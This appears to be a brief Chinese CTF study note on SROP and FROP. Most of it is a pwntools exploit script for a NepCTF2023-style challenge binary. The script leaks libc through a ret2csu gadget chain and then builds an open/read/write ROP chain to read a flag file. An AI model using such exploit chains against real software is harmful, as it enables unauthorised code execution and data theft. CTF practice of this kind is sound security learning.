除了之前的一般的rop,还有一些高级的运用,srop和frop

srop

还没完全学成,在我的导航里面有参考资料

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
from pwn import *
context.arch='amd64'
context.log_level='debug'
power_rop1=0x0000000000400806
power_rop2=0x00000000004007F0
buf_inp=0x0000000000601039
pop_rbp=0x0000000000400628
bss_addr=0x0000000000601050
def getpower(avg1,avg2,avg3,got):
    payload=p64(power_rop1)+p64(0)+p64(0)+p64(1)+p64(got)+p64(avg1)+p64(avg2)+p64(avg3)
    payload+=p64(power_rop2)+p64(0)*7#为什么是7呢,因为虽然只有6个pop但是上面还有个rsp+8
    return payload

p=process('./pwn')


#p=remote("ctf.v50to.cc",10402)
elf=ELF('pwn')
libc=ELF('./libc-2.27.so')
syscall_got=elf.got['syscall']
seccomp_init_got=elf.symbols['seccomp_init']



payload=b'flag\x00\x00\x00\x00'*(0x30//8)+p64(0x4007b0)
payload+=getpower(0,0,buf_inp,syscall_got)

payload+=getpower(1,1,syscall_got,syscall_got)
payload+=p64(pop_rbp)+p64(buf_inp+8)

payload+=p64(0x000000000040076D)

p.sendlineafter(b'!!!\n',payload)
# p.sendlineafter(b'NepCTF2023!\n',payload)
p.sendline(b'flag\x00\x00\x00\x00'+p64(0x601000))
# pause()


recvaddr=p.recvuntil(b'\x7f')
sysaddr=u64(recvaddr[-6:].ljust(8,b'\x00'))
print(hex(sysaddr))
libcbase=sysaddr-libc.symbols['syscall']
print('libcbase',hex(libcbase))

pop_rax=libcbase+0x000000000001b500
open_addr=libcbase+libc.symbols['open']
read_addr=libcbase+libc.symbols['read']
write_addr=libcbase+libc.symbols['write']
pop_rdi=0x0000000000400813
pop_rdx_rsi=libcbase+0x0000000000130539
pop_rsp=libcbase+0x000000000000396c
pop_rcx=libcbase+0x00000000000e433e

payload=b'flag\x00\x00\x00\x00'*(0x30//8)+p64(0x4007b0)
payload+=p64(pop_rax)+p64(2)+p64(pop_rcx)+p64(0)
# payload+=getpower(buf_inp,0,0,syscall_got)
payload+=flat([pop_rdi,buf_inp,pop_rdx_rsi,0,0,pop_rbp,buf_inp+0x30,sysaddr+23])
payload+=p64(pop_rax)+p64(0)
payload+=flat([pop_rdi,3,pop_rdx_rsi,0x30,buf_inp,sysaddr+23])
payload+=p64(pop_rax)+p64(1)
payload+=flat([pop_rdi,1,pop_rdx_rsi,0x30,buf_inp,sysaddr+23])
# payload+=flat([pop_rdi,buf_inp-1,pop_rdx_rsi,0,0,open_addr])
# payload+=
payload+=p64(0x000000000040076D)
print('len',len(payload))
# p.sendlineafter(b'NepCTF2023!\n',payload)
p.sendlineafter(b'!!!\n',payload)

# # pop_rax=libcbase+0x000000000001b500
# # payload2=

p.interactive()

frop

就是iofile,在我的导航里面有